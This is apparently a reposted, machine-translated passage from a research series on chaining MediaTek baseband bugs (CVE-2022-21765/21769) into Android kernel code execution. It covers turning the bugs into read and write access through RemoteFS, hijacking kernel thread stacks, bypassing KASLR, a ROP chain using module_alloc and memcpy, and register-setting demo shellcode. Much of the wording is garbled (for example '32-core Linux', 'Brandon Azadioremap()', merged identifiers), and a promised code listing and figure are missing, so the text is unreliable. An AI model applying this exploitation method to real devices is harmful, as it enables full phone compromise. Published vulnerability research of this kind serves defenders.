-->

Full-Chain Attacks: A Look at Baseband Vulnerability Exploits - 2


Preface

In Hardwear.io's Basebanheimer talk, a method was introduced to achieve arbitrary code execution using 32-core Linux on its older Helio series chipsets by exploiting the MediaTek baseband Pivot vulnerability CVE-2022-21765.

Based on previous thoughts, this vulnerability could theoretically also be exploited on MediaTek's latest chipset series (Dimensity, which uses 64-bit cores).

Vulnerabilities: CVE-2022-21765 and CVE-2022-21769

To recap, these vulnerabilities provide OOB read and write functionality in the Linux kernel driver that provides an interface between the application (AP) and the cellular processor (CP), which MediaTek calls the CCCI driver. Specifically, these errors stem from a lack of plausibility verification of the offset and length values ​​of the ring buffer stored in the shared memory between AP and CP during the ring buffer implementation. Here is the code in question:


But at this point, we face many challenges because the available OOB primitives are limited.

First, our maximum out-of-bounds limit is 2*UINT_MAX. Second, and most crucially, since we are corrupting the offset that the kernel uses for its ring buffer operations, we have no direct control:

  • The location into which the read operation was read (i.e. the target of the OOB read "leaking").
  • The location written by the write operation (i.e. the value written)

Exploiting ioremap OOB errors in the Linux kernel

After completing the development of the Density series, we happened to see p0ly and Vincent Dehors' latest attack speech on Tesla Pwn. They demonstrated an interesting exploit chain, the last step of which cleverly exploits a very similar vulnerability similarly. This reveals an interesting phenomenon in how very different vendors manage to solve the same problem.

Their approach has something in common with Brandon Azadioremap() 's original idea: target other allocations in the vmalloc region (these ring buffers are ed, served by the vmalloc region).

We also adopted Brandon's idea and tried distribution _do_fork.

So this gives us an idea of ​​a target to attack, but there are still a few key questions to address:

  • Can we convert the limited OOB R/W primitives into one with sufficient control over the written values?
  • How can we bypass KASLR?
  • Can we get a predictable vmalloc area layout on the target to select suitable _do_forkvictims?

Improve the OOB vulnerability of CVE-2022-21765/CVE-2022-21769

Most of the multiple-ring buffers used by AP and CP are very noisy, which makes our exploitation difficult.

Fortunately, we found that the ring buffer used only with the Remote File System (RemoteFS) implementation became very smooth after the initial startup. So this allows us to take advantage of it without worrying too much about its proper functioning.

More importantly, the RemoteFS API provides us with the ideal tools to transform out-of-bounds (OOB) primitives into almost fully controlled read and write operations:

  • To write to memory, we can first prepare the controlled data using RemoteFS's regular File Write API.
  • We can then "read back" this data using the file reading API and create a write-what-where operation using the OOB write primitive, see details CVE-2022-21765.
  • We can also do the same thing in reverse, to read arbitrary memory (from where): corrupt the ring buffer when the file is written, store the required leaked memory into the file, and then use the file to read The API reads it back as expected.

Regarding "where to write" we have to take into account a limitation that the value written is not fully controlled. This is because each write to the ring buffer includes a head and a tail, as shown in the following figure:


Therefore, we need to choose a corruption target that can tolerate the side effects of adjacent bytes being overwritten by head and tail "noise".

Finding reliable Vmalloc victims and bypassing KASLR

During our research, we discovered some potential targets, including thread stacks and bpf programs, which can be /proc/vmallocinfoviewed in.

Although KASLR randomization is not applied to the vmalloced addresses, the layout is not completely static due to the "natural" entropy provided by the runtime.

Still, early distribution has a predictable and stable pattern. Since our allocation happens in the early stages of vmalloc, it ends up at a predictable address, and adjacent allocations are also predictable with high accuracy.

Based on this, we can determine the location-based allocation in vmalloc _do_fork.

To summarize, allocations in vmalloc regions _do_fork represent thread stacks in the kernel. These stacks are used by user space threads during system call execution and are also used by kernel threads to store their execution stacks.

Kernel threads in particular have fairly predictable call stacks because the Linux scheduler generates them in exactly the same way. So the top of these stacks is the pushed stack frames ret_from_fork, worker_thread, kthread, schedule etc.

Therefore, by overwriting the corresponding stack frame of a scheduled kernel thread, we can easily "race" its schedule, hijack the execution of that kernel thread, create an ROP chain, and execute custom code from there.

Additionally, choosing such a target provides us with a direct path to bypass KASLR. In our case we found that in the RemoteFS ring buffer, we could always find a +0x3eb8``kthreadregion containing a fixed pointer (the same region that could be targeted for overwriting), which simplified the process of leaking the KASLR slide of the kernel image.

ROP chain of kernel RCE

p0ly and Vincent Dehors took the classic ROP approach of overwriting strings to perform ROP calls. This approach is efficient and clean but has the limitation that commands such as poweroff_cmdand can only be executed as the kworker root user poweroff_work_func.

This situation may have meant the successful end of the attack in the past, but in today's Android system, SELinux imposes strict restrictions on the user, making this approach almost impossible to achieve effective operation.

Even the shell cannot be connected due to a lack of permission to open the network socket. Therefore, when facing smartphones equipped with MediaTek Dimensity chipsets, we need to find more powerful attack methods.

Brandon Azad used ROP technology, however this didn't work for us because the MediaTek core blocked ___bpf_prog_run()this approach.

In particular, MediaTek Dimensity kernels are forced to perform BPF JIT compilation, which results in this API being completely omitted from the kernel:

static unsigned int ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn,
                    u64 *stack)
...
Instead, what we did was look at the BPF JIT implementation we had. It turns out that always JITing an eBPF program means module_allocthat the call (which simply allocates RWX memory to the caller) exists in the kernel. Of course, this provides a perfect environment for ROP chaining to arbitrary shellcode.
void *module_alloc(unsigned long size)
{
  u64 module_alloc_end = module_alloc_base + MODULES_VSIZE;
  gfp_t gfp_mask = GFP_KERNEL;
  void *p;

  ...

  p = __vmalloc_node_range(size, MODULE_ALIGN, module_alloc_base,
        module_alloc_end, gfp_mask, PAGE_KERNEL_EXEC, 0,
        NUMA_NO_NODE, __builtin_return_address(0));
...

We still need to find tools to prepare the necessary register values ​​for the steps of the ROP chain which require more precise control than using just one register.

One of the difficulties is that functions like the ones in the Linux kernel memcpyare often so well optimized that they don't even use the stack (so their epilogue doesn't provide a convenient link to the ROP gadget), and this is because they need to be available early in the system boot stage is run, the stack may not have been initialized at that time. Fortunately, however, memcpythere are some wrappers around that can increase the usage of the stack ( copy_from_usercompare this to what was used in approach 3).

Finally, we can use ROP memcpyto copy the required shellcode from a reliable fixed address to the new RWX region. In our case, we were able to leverage our thread stack again and use the top of that stack frame do_forkas as a staging area.

When these steps are combined in an ROP chain, we can execute a completely arbitrary shellcode.

1. set x0 = 0x100 (size of the injected code), x1 = <dummy>
 2. module_alloc(x0:size) -> x0:dst
 3. set x8 = x0
 4. set x0 = 0x100 (size of the injected code), x1 = <dummy>
 5. set x2 = x0
 6. set x0 = <dummy>, x1 = <code source>
 7. set x0 = x8
 8. memcpy(x0:dst, x1:src, x2:size) (preserves x0)
 9. set x8 = x0
10. jump on x8

 Vulnerability Exploitation Demonstration

Finally, the link below is a video demonstration of exploiting the RCE vulnerability on a Dimensity chipset device (Xiaomi POCO M3 5G):

As shown in the video, for the sake of simplicity, our proof of concept only executed a shellcode that set all registers to a unique pattern to demonstrate efficient execution of the code (extracted from the POC source code).

const int shellcode_size = __SHELLCODE_SIZE__;
const ulong shellcode_addr = target_vmalloc + 0x1000;

uint shellcode[__SHELLCODE_SIZE__/4] = {
  0x00000000, // padding for exploit_write
  0xd2802020, // mov  x0, #0x101
  0xd2802221, // mov  x1, #0x111
  0xd2802422, // mov  x2, #0x121
  0xd2802623, // mov  x3, #0x131
  0xd2802824, // mov  x4, #0x141
  0xd2802a25, // mov  x5, #0x151
  0xd2802c26, // mov  x6, #0x161
  0xd2802e27, // mov  x7, #0x171
  0xd2803028, // mov  x8, #0x181
  (...)
  0xd280563a, // mov x26, #0x2b1
  0xd280583b, // mov x27, #0x2c1
  0xd2805a3c, // mov x28, #0x2d1
  0xd2805c3d, // mov x29, #0x2e1
  0xd2805e3e, // mov x30, #0x2f1
  0xd65f03c0, // ret
};

Source :- https://labs.taszk.io/articles/post/full_chain_bb_part3/